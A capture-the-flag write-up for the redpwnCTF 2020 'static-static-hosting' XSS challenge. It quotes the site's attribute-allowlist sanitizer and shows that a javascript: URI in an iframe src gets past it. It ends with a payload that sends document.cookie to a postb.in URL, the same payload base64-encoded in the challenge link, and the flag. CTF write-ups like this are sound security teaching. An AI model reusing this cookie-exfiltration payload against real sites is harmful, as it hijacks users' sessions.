static-static-hosting

redpwnCTF 2020 web

static-static-hosting

This is another XSS challenge where we tackle with another filter

the filter

Under the network activities, we can find the filter.

function clean(input) {
    const template = document.createElement('template');
    const html = document.createElement('html');
    template.content.appendChild(html);
    html.innerHTML = input;

    sanitize(html);

    const result = html.innerHTML;
    return result;
}

function sanitize(element) {
    const attributes = element.getAttributeNames();
    for (let i = 0; i < attributes.length; i++) {
        // Let people add images and styles
        if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {
            element.removeAttribute(attributes[i]);
        }
    }

    const children = element.children;
    for (let i = 0; i < children.length; i++) {
        if (children[i].nodeName === 'SCRIPT') {
            element.removeChild(children[i]);
            i --;
        } else {
            sanitize(children[i]);
        }
    }
}

Basically, this means that we could only use ['src', 'width', 'height', 'alt', 'class'] as our attributes in tags. This still gives us a lot of room to work with.

Embed and iframe

I thought about the <embed> and <iframe> tags as their src attribute could trigger java script.
However, when I tried, <embed> worked for me on my local computer but not the bot as I am running Firefox and the bot is running chrome. But <iframe> worked for both.

iframe

<iframe src="javascript:alert(1)"></iframe>

And it worked! So the next step is to do the post-bin move and grab the document.cookie

Payload

I encoded my payload into base64 and fed it to the bot. Moments later, I got the flag.

<iframe src="javascript:window.location.assign(`https://postb.in/1593716639876-9019670642446?cookie=${document.cookie}`)"></iframe>
https://static-static-hosting.2020.redpwnc.tf/site/#PGlmcmFtZSBzcmM9ImphdmFzY3JpcHQ6d2luZG93LmxvY2F0aW9uLmFzc2lnbihgaHR0cHM6Ly9wb3N0Yi5pbi8xNTkzNzE2NjM5ODc2LTkwMTk2NzA2NDI0NDY/Y29va2llPSR7ZG9jdW1lbnQuY29va2llfWApIj48L2lmcmFtZT4=
flag{wh0_n33d5_d0mpur1fy}